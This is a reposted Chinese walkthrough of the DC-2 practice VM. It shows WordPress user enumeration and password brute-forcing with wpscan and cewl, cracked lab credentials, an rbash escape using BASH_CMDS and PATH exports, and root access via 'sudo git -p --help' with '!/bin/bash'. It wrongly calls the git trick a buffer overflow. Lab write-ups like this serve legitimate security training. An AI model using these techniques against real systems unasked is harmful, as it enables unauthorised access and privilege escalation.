DC-2靶机

Posted bingtang123

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了DC-2靶机相关的知识,希望对你有一定的参考价值。

仅供个人娱乐

靶机信息

下载地址:http://www.five86.com/downloads/DC-2.zip

一、主机扫描

技术图片

二、信息收集

技术图片

修改hosts文件

windows:C:WindowsSystem32driversetc

linux:/etc/hosts

技术图片

wpscan --url http://dc-2 --enumerate u

技术图片
技术图片

提示cewl 爬密码

cewl http://dc-2 > 1.txt

技术图片

破解密码

wpscan --url http://dc-2 -U 2.txt -P 1.txt

技术图片
技术图片
技术图片

登录账户信息收集

Username: jerry, Password: adipiscing

Username: tom, Password: parturient

技术图片
技术图片

尝试ssh登录  tom   parturient   7744

技术图片

查看当前环境

echo $PATH

技术图片

有问题找百度

添加环境变量

BASH_CMDS[a]=/bin/sh;a

export PATH=$PATH:/bin/          #添加$PATH,cat和su都在/bin下

export PATH=$PATH:/usr/bin           #sudo在/usr/bin下

cat flag3.txt

技术图片

Username: jerry, Password: adipiscing

技术图片

切换账户进行信息收集

技术图片

sudo -l 查看权限

技术图片

有git权限,git有一个缓冲区溢出漏洞,在使用sudo git -p --help时,不需要输入root密码即可以root权限执行这条命令

技术图片

在末行命令模式输入 !/bin/bash 或 !‘sh‘ 完成提权

!/bin/bash

技术图片

以上是关于DC-2靶机的主要内容,如果未能解决你的问题,请参考以下文章

渗透测试学习之靶机DC-2

DC-2靶机

DC-2靶机

DC系列靶机

DC-2靶场-渗透测试

靶机渗透HACKME: 1